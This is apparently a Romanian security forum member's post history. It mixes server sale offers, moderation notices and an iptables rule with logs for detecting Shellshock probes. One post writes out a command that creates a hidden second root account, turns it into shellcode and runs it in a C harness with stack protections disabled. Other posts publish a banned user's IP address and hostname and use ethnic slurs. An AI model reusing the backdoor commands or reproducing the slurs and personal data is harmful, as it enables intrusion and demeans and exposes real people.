-
Posts
4985 -
Joined
-
Last visited
-
Days Won
382
Everything posted by aelius
-
POODLE: un protocol de criptare antic pune în pericol browser-ele moderne
aelius replied to Nytro's topic in Stiri securitate
This POODLE Bites: Exploiting The SSL 3.0 Fallback [PDF] -
Eu am dat ban si lui HTBrain si lui verdelemeu. Unul dintre ei striga hotul vaitandu-se ca a fost tepuit. Celalalt a spus clar ca nu-i mai da banii inapoi si tot asa.
-
) Dude, e Dragos Manac. E ca si cum ati invata pe Radu Georgescu business.
-
Am pe stoc 3 servere dedicate cu urmatoarea configuratie Xeon 3065 @ 2.33 GHz 2 Core, 4MB L2 Cache 2 x 160 GB SATA2, Raid 1 Mirror Memory: 8 GB Monthly traffic: 20 TB Network Port Speed: 100Mbps 1 IP Address with reverse dns Monthly: 20 euro Setup fee: 10 euro // update: mai sunt doua bucati. // update: s-au dat
-
Eu am cumparat licenta de la ei. E destul de ok pretul. Daca vreti sa vedeti filme full hd/bluray fara sa va stea procul in 100% (se foloseste de GPU), asta este playerul ce-l cautati. Are slowmotion si toate cele iar calitatea nu cred ca poate fi egalata de vreun alt player.
-
Cea mai simpla metoda sa rootezi orice telefon android
aelius replied to slanina's topic in Tutoriale video
Bea acidul din baterie si lichidul de frana. Autodistrugere pentru totdeauna. -
Da, clar. Nu face diferenta intre request si continut. Daca adaugi regula cu string "muje" nici nu o sa poti scrie asta pe forum (desigur, doar pe http)
- 3 replies
-
- iptables
- shellshock
-
(and 2 more)
Tagged with:
-
Nu da. Am urmarit log-urile cu tail. Si apoi cine stie ca se face detectie pe "() {" sa puna spatii aiurea pentru a nu face trigger. In orice caz, e o balarie de bug atata timp cat nu se folosesc scripturi cgi-bin.
- 3 replies
-
- iptables
- shellshock
-
(and 2 more)
Tagged with:
-
Primul test: root@pluto:~# useradd -u 0 -g 0 rst && echo -e "parolavietii\nparolavietii" |passwd rst useradd: UID 0 is not unique Ah, lipseste ceva: root@pluto:~# useradd -o -u 0 -g 0 rst && echo -e "parolavietii\nparolavietii" |passwd rst Enter new UNIX password: Retype new UNIX password: passwd: password updated successfully Se pare ca a functionat si mi-am adaugat user rst cu uid/gid 0 si am setat si parola pentru acesta intr-o singura linie de comanda: root@pluto:~# grep rst /etc/passwd /etc/shadow /etc/passwd:rst:x:0:0::/home/rst:/bin/sh /etc/shadow:rst:$6$zaJmMm5X$.F0fvLkcrZQwXTlR4F6HcNro8UFKHvIL8klT72w69h27fsuEZ5/Wlxlc5ScW6Dl/zEYABlpXeGIsFFBvTYiul.:16354:0:99999:7::: Hai sa incercam un shellcode generator. Nu stiu cat de bun o fi: marian@pluto:~/work$ cc shellcode_gen.c -o shellcode_gen marian@pluto:~/work$ ./shellcode_gen 'useradd -o -u 0 -g 0 rst && echo -e "parolavietii\nparolavietii" |passwd rst' output.txt Shellcode lenght: 79 \x31\xc0\x83\xec\x01\x88\x04\x24 \x68\x2e\x74\x78\x74\x68\x74\x70 \x75\x74\x66\x68\x6f\x75\x89\xe6 \x83\xec\x01\x88\x04\x24\x68\x72 \x61\x64\x64\x68\x2f\x75\x73\x65 \x68\x73\x62\x69\x6e\x68\x75\x73 \x72\x2f\x83\xec\x01\xc6\x04\x24 \x2f\x50\x56\x83\xee\x12\x56\xb0 \x0b\x89\xf3\x89\xe1\x31\xd2\xcd \x80\xb0\x01\x31\xdb\xcd\x80 Nu stiu daca l-a generat bine, dar incercam o aroganta bisericeasca marian@pluto:~/work$ pico test.c GNU nano 2.2.6 File: test.c #include <stdio.h> unsigned char slujbaBisericeasca[] = "\x31\xc0\x83\xec\x01\x88\x04\x24" "\x68\x2e\x74\x78\x74\x68\x74\x70" "\x75\x74\x66\x68\x6f\x75\x89\xe6" "\x83\xec\x01\x88\x04\x24\x68\x72" "\x61\x64\x64\x68\x2f\x75\x73\x65" "\x68\x73\x62\x69\x6e\x68\x75\x73" "\x72\x2f\x83\xec\x01\xc6\x04\x24" "\x2f\x50\x56\x83\xee\x12\x56\xb0" "\x0b\x89\xf3\x89\xe1\x31\xd2\xcd" "\x80\xb0\x01\x31\xdb\xcd\x80"; main() { int (*ret)() = (int(*)())slujbaBisericeasca; ret(); } Compilam rahatul pentru a fi aruncat peste gardul vecinului: marian@pluto:~/work$ cc test.c -o test marian@pluto:~/work$ file test test: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.26, BuildID[sha1]=0xd291df14bd39d22a6b617f9da72ad74d4a5cc85f, not stripped marian@pluto:~/work$ Sa vedem totusi ce zice: marian@pluto:~/work$ strace ./test execve("./test", ["./test"], [/* 13 vars */]) = 0 brk(0) = 0x601000 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory) mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f6e15c3a000 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory) open("/etc/ld.so.cache", O_RDONLY) = 3 fstat(3, {st_mode=S_IFREG|0644, st_size=54621, ...}) = 0 mmap(NULL, 54621, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f6e15c2c000 close(3) = 0 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory) open("/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY) = 3 read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\360\1\0\0\0\0\0"..., 832) = 832 fstat(3, {st_mode=S_IFREG|0755, st_size=1599536, ...}) = 0 mmap(NULL, 3713112, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f6e15692000 mprotect(0x7f6e15813000, 2097152, PROT_NONE) = 0 mmap(0x7f6e15a13000, 20480, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x181000) = 0x7f6e15a13000 mmap(0x7f6e15a18000, 18520, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f6e15a18000 close(3) = 0 mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f6e15c2b000 mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f6e15c2a000 mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f6e15c29000 arch_prctl(ARCH_SET_FS, 0x7f6e15c2a700) = 0 mprotect(0x7f6e15a13000, 16384, PROT_READ) = 0 mprotect(0x7f6e15c3c000, 4096, PROT_READ) = 0 munmap(0x7f6e15c2c000, 54621) = 0 --- SIGSEGV (Segmentation fault) @ 0 (0) --- +++ killed by SIGSEGV +++ Segmentation fault Ne-a dat 'Segmentation fault'. Asta inseamna ca trebuie compilat in alt fel. So, let's try to disable the fucking stack protection and enable stack execution. marian@pluto:~/work$ gcc -fno-stack-protector -z execstack -o test test.c Copyright by Preotul RST-ului anul 2021. Hai bre, ce e cu 2018 ala acolo copyright. Aveti simtul umorului prea dezvoltat sau ati fumat ceva nasol ? Astea cu shellcodes imi par deplasate rau. Practic te bazezi pe idiotenia unui om de a rula ceva ca ROOT. Astfel e logic ca nu functioneaza. Low end rau frate. Un rahat de genul il faci in cateva minute. Si de ce as seta chmod 777 pe cele doua fisiere cand pot sa generez un binar in sistem setat cu bit suid/sgid cu care pot executa orice comanda cu user/group owner.
-
Acum cateva zile cereai sfaturi despre un business cu servere dedicate, hosting si servicii. Acum bag seama ca te ocupi cu servere sparte si rahaturi. Sper sa nu mai intrebi chestii de genul pe aici. Chiar nu vrea nimeni sa-si piarda timpul ajutand un individ sa sparga servere, sa scaneze, sa faca spam si asa mai departe. Te ajutam cand vedem ca ai potential si vointa sa faci ceva util, nu pentru idiotenii. Pentru a vedea spatiul disponibil pe partitii in linux, poti utiliza urmatoarea comanda: df -h Thread closed.
-
Doua servere pe stoc: Xeon 3430 @ 2.4 GHz 4 Core, 4 Threads, 8 MB Cache 1 x 500 GB SATA Memory: 8 GB Monthly traffic: 20 TB Network Port Speed: 100Mbps Two IP Addresses Monthly cost: 35 euro Setup fee: 0 Upgrade: - Upgrade to 16 GB Memory: 8 euro/month - Upgrade to 32 GB Memory: 14 euro/month - Upgrade to 2 x 500 GB SATA (raid 1): 6 euro/month // s-au dat
-
// Update r8168_8.038.00-1 => r8168_8.039.00-1 Versiunea de driver a fost schimbata iar link-ul nu mai este valid. La comanda dget, utilizati link-ul de mai jos. In rest, respectati celalalte comenzi. http://ftp.us.debian.org/debian/pool/main/r/r8168/r8168_8.039.00-1.dsc Directorul este "r8168-8.039.00/"
-
Salut. Skype nu utilizeaza un port anume. Poti bloca si un range 80-65535 si el tot se va conecta. Poate utiliza orice port intre 1 si 65535. Am vazut ca se conecteaza inclusiv pe porturile 22,23,25 care sunt cu totul pentru altceva. Il poti bloca in schimb cu o singura regula iptables. Singura posibilitate de a sari peste restrictie este sa folosesti VPN. Nu pare competitie. Vrei tu sa aflii asta, nu ? hint: l7
-
O regula simpla cu care puteti face logging sau puteti bloca shellshock. iptables -I INPUT -p tcp -m string --algo bm --string "() {" --dport 80 -j LOG --log-prefix "shellshock rule 1: " Cum apare ? pluto:~# dmesg [12526689.726816] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=192.185.82.92 DST=xxx.xxx.88.5 LEN=287 TOS=0x00 PREC=0x00 TTL=45 ID=21610 DF PROTO=TCP SPT=39893 DPT=80 WINDOW=229 RES=0x00 ACK PSH URGP=0 [12573352.452710] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=108.163.187.146 DST=xxx.xxx.88.10 LEN=421 TOS=0x00 PREC=0x00 TTL=48 ID=25760 DF PROTO=TCP SPT=42647 DPT=80 WINDOW=115 RES=0x00 ACK PSH URGP=0 [12573362.110534] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=184.106.196.169 DST=xxx.xxx.88.7 LEN=419 TOS=0x00 PREC=0x00 TTL=48 ID=55433 DF PROTO=TCP SPT=40201 DPT=80 WINDOW=183 RES=0x00 ACK PSH URGP=0 [12573364.514235] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=110.44.30.204 DST=xxx.xxx.88.6 LEN=429 TOS=0x00 PREC=0x00 TTL=40 ID=20190 DF PROTO=TCP SPT=38820 DPT=80 WINDOW=46 RES=0x00 ACK PSH URGP=0 [12573369.889964] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=194.28.86.63 DST=xxx.xxx.88.5 LEN=420 TOS=0x00 PREC=0x00 TTL=56 ID=32172 DF PROTO=TCP SPT=48732 DPT=80 WINDOW=115 RES=0x00 ACK PSH URGP=0 [12576046.844450] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=72.249.151.145 DST=xxx.xxx.88.5 LEN=428 TOS=0x00 PREC=0x00 TTL=48 ID=11314 DF PROTO=TCP SPT=46735 DPT=80 WINDOW=229 RES=0x00 ACK PSH URGP=0 [12581893.832430] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=89.47.247.48 DST=xxx.xxx.88.4 LEN=427 TOS=0x00 PREC=0x00 TTL=56 ID=47806 DF PROTO=TCP SPT=40027 DPT=80 WINDOW=46 RES=0x00 ACK PSH URGP=0 [12582722.880301] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=180.210.205.209 DST=xxx.xxx.88.10 LEN=394 TOS=0x00 PREC=0x00 TTL=51 ID=34666 DF PROTO=TCP SPT=45498 DPT=80 WINDOW=46 RES=0x00 ACK PSH URGP=0 [12582723.333809] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=180.210.205.209 DST=xxx.xxx.88.10 LEN=397 TOS=0x00 PREC=0x00 TTL=51 ID=59992 DF PROTO=TCP SPT=45599 DPT=80 WINDOW=46 RES=0x00 ACK PSH URGP=0 [12582723.800026] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=180.210.205.209 DST=xxx.xxx.88.10 LEN=370 TOS=0x00 PREC=0x00 TTL=51 ID=5234 DF PROTO=TCP SPT=45681 DPT=80 WINDOW=46 RES=0x00 ACK PSH URGP=0 [12582724.856256] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=180.210.205.209 DST=xxx.xxx.88.10 LEN=367 TOS=0x00 PREC=0x00 TTL=51 ID=13614 DF PROTO=TCP SPT=45879 DPT=80 WINDOW=46 RES=0x00 ACK PSH URGP=0 [12582725.330168] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=180.210.205.209 DST=xxx.xxx.88.10 LEN=379 TOS=0x00 PREC=0x00 TTL=51 ID=19157 DF PROTO=TCP SPT=45962 DPT=80 WINDOW=46 RES=0x00 ACK PSH URGP=0 [12582725.800422] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=180.210.205.209 DST=xxx.xxx.88.10 LEN=397 TOS=0x00 PREC=0x00 TTL=51 ID=53517 DF PROTO=TCP SPT=46069 DPT=80 WINDOW=46 RES=0x00 ACK PSH URGP=0 [12582726.258118] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=180.210.205.209 DST=xxx.xxx.88.10 LEN=370 TOS=0x00 PREC=0x00 TTL=51 ID=53738 DF PROTO=TCP SPT=46149 DPT=80 WINDOW=46 RES=0x00 ACK PSH URGP=0 [12582726.708889] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=180.210.205.209 DST=xxx.xxx.88.10 LEN=367 TOS=0x00 PREC=0x00 TTL=51 ID=29443 DF PROTO=TCP SPT=46236 DPT=80 WINDOW=46 RES=0x00 ACK PSH URGP=0 [12582822.019042] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=23.95.95.168 DST=xxx.xxx.88.8 LEN=426 TOS=0x00 PREC=0x00 TTL=45 ID=51576 DF PROTO=TCP SPT=47145 DPT=80 WINDOW=115 RES=0x00 ACK PSH URGP=0 [12583500.543438] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=173.83.247.209 DST=xxx.xxx.88.6 LEN=304 TOS=0x00 PREC=0x00 TTL=54 ID=35104 DF PROTO=TCP SPT=57258 DPT=80 WINDOW=46 RES=0x00 ACK PSH URGP=0 [12584394.167981] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=103.23.21.67 DST=xxx.xxx.88.5 LEN=427 TOS=0x00 PREC=0x00 TTL=45 ID=29985 DF PROTO=TCP SPT=44368 DPT=80 WINDOW=115 RES=0x00 ACK PSH URGP=0 [12606520.929034] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=94.23.42.182 DST=xxx.xxx.88.7 LEN=419 TOS=0x00 PREC=0x00 TTL=58 ID=19046 DF PROTO=TCP SPT=36147 DPT=80 WINDOW=115 RES=0x00 ACK PSH URGP=0 [12606529.908862] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=85.232.60.34 DST=xxx.xxx.88.5 LEN=420 TOS=0x00 PREC=0x00 TTL=51 ID=14367 DF PROTO=TCP SPT=49751 DPT=80 WINDOW=46 RES=0x00 ACK PSH URGP=0 [12606541.611815] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=67.198.141.98 DST=xxx.xxx.88.6 LEN=429 TOS=0x00 PREC=0x00 TTL=51 ID=8906 DF PROTO=TCP SPT=33844 DPT=80 WINDOW=229 RES=0x00 ACK PSH URGP=0 [12609706.584728] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=67.23.9.241 DST=xxx.xxx.88.5 LEN=428 TOS=0x00 PREC=0x00 TTL=45 ID=10222 DF PROTO=TCP SPT=43102 DPT=80 WINDOW=92 RES=0x00 ACK PSH URGP=0 [12616465.783127] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=67.23.9.241 DST=xxx.xxx.122.5 LEN=427 TOS=0x00 PREC=0x00 TTL=45 ID=24709 DF PROTO=TCP SPT=40671 DPT=80 WINDOW=92 RES=0x00 ACK PSH URGP=0 [12617580.394705] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=213.238.169.117 DST=xxx.xxx.88.8 LEN=426 TOS=0x00 PREC=0x00 TTL=47 ID=13535 DF PROTO=TCP SPT=58437 DPT=80 WINDOW=115 RES=0x00 ACK PSH URGP=0 [12619408.726456] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=202.181.246.66 DST=xxx.xxx.88.5 LEN=427 TOS=0x00 PREC=0x00 TTL=41 ID=13254 DF PROTO=TCP SPT=26414 DPT=80 WINDOW=46 RES=0x00 ACK PSH URGP=0 [12659626.759636] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=192.254.250.180 DST=xxx.xxx.102.3 LEN=293 TOS=0x00 PREC=0x00 TTL=46 ID=61584 DF PROTO=TCP SPT=22274 DPT=80 WINDOW=229 RES=0x00 ACK PSH URGP=0 Note: - Am specificat doar port 80 iar regula este doar pentru logging. Se poate adauga una pentru logging si alta pentru reject/drop - Mai multe despre shellshock aici: http://en.wikipedia.org/wiki/Shellshock_(software_bug) - Mi-a venit ideea asta pentru ca multi sunt tentati sa foloseasca snort. Probabil stiti ca la reguli multe, snort consuma foarte multe resurse CPU
- 3 replies
-
- 1
-
-
- iptables
- shellshock
-
(and 2 more)
Tagged with:
-
Adresa ip pacatoasa nu poate suporta 1.Miluie?te-m?, Dumnezeule, dup? mare mila Ta 2.?i dup? mul?imea îndur?rilor Tale, ?terge f?r?delegea mea. 3.Mai vârtos m? spal? de f?r?delegea mea ?i de p?catul meu m? cur??e?te. 4.C? f?r?delegea mea eu o cunosc ?i p?catul meu înaintea mea este pururea. 5.?ie unuia am gre?it ?i r?u înaintea Ta am f?cut, a?a încât drept e?ti Tu întru cuvintele Tale ?i biruitor când vei judeca Tu. 6.C? iat? întru f?r?delegi m-am z?mislit ?i în p?cate m-a n?scut maica mea. 7.C? iat? adev?rul ai iubit; cele near?tate ?i cele ascunse ale în?elepciunii Tale, mi-ai ar?tat mie. 8.Stropi-m?-vei cu isop ?i m? voi cur??i; sp?la-m?-vei ?i mai vârtos decât z?pada m? voi albi. 9.Auzului meu vei da bucurie ?i veselie; bucura-se-vor oasele mele cele smerite. 10.Întoarce fa?a Ta de la p?catele mele ?i toate f?r?delegile mele ?terge-le. 11.Inim? curat? zide?te intru mine, Dumnezeule ?i duh drept înnoie?te întru cele dinl?untru ale mele. 12.Nu m? lep?da de la fa?a Ta ?i Duhul T?u cel sfânt nu-l lua de la mine. 13.D?-mi mie bucuria mântuirii Tale ?i cu duh st?pânitor m? înt?re?te. 14.Înv??a-voi pe cei f?r? de lege c?ile Tale ?i cei necredincio?i la Tine se vor întoarce. 15.Izb?ve?te-m? de v?rsarea de sânge, Dumnezeule, Dumnezeul mântuirii mele; bucura-se-va limba mea de dreptatea Ta. 16.Doamne, buzele mele vei deschide ?i gura mea va vesti lauda Ta. 17.C? de ai fi voit jertf?, ?i-a? fi dat; arderile de tot nu le vei binevoi. 18.Jertfa lui Dumnezeu: duhul umilit; inima înfrânt? ?i smerit? Dumnezeu nu o va urgisi. 19.F? bine, Doamne, întru bun? voirea Ta, Sionului, ?i s? se zideasc? zidurile Ierusalimului. 20.Atunci vei binevoi jertfa drept??ii, prinosul ?i arderile de tot; atunci vor pune pe altarul T?u vi?ei. AMIN Roaga-te domnului pacatosule, caci sfarsitul este aproape
-
E un singur server, a ramas de la un client ce a trecut la un i7. Haswell Intel CPU Intel i5-4570 @ 3.2 Ghz 4 Core, 4 Threads, 6MB L2 Cache 16 GB DDR3 Memory 1 x 240 GB SSD Force 3 (6Gb/s, 85.000 IOPS) 100 Mbps (to any destination) 20 TB Monthly traffic 2 IP Addresses included with reverse DNS Monthly price: 45 euro Setup fee: 0 // s-a dat la fratele sclipici
-
Threadul celalalt e deschis. La ce gest te referi ?
-
Daca mai ziceti ca MUCUL ala mic e Roman va dau ban. Ala e tigan, evitati biohazardurile )
-
)))))) Prost esti ma. O sa inchidem inregistrarea sa nu mai aiba acces toti ratatii ca tine.Deci tu esti asta de aici.
-
E obligatoriu doar la TLS
-
Am gramada de costume. Ma imbrac si eu cand merg pe undeva. Doar nu o sa iau costum cand merg la sala
-
Ban permanent. Aici nu se rezuma treaba la sql in pentagon si penetrarea lu ma-ta grasa. Sunt chestii mult mai importante de descoperit si de citit pe internet decat exploatarea vulnerabilitatilor web. Sclavule. Raspuns astepti cand adresezi o intrebare. Thread closed. Username: gabybv Date: 05.10.2014 / 00:20 The IP Address is: 79.116.235.220 The host name is: 79-116-235-220.dynamic.brasov.rd?snet.ro
-
Ba labare, inteleg sa dai UP la un anunt important sau cand vinzi ceva si au trecut minim 24 de ore de la primul post. Tu dai UP la ce ? la un cancer tiganesc de site pe care l-ai spart? De unde cacat sunteti ma de la tara ?
-
Este trafic lunar. 500 GB trafic lunar inseamna un consum constant de 1,52 Mbps. Adica maxim 23 de ascultatori la 64kbps.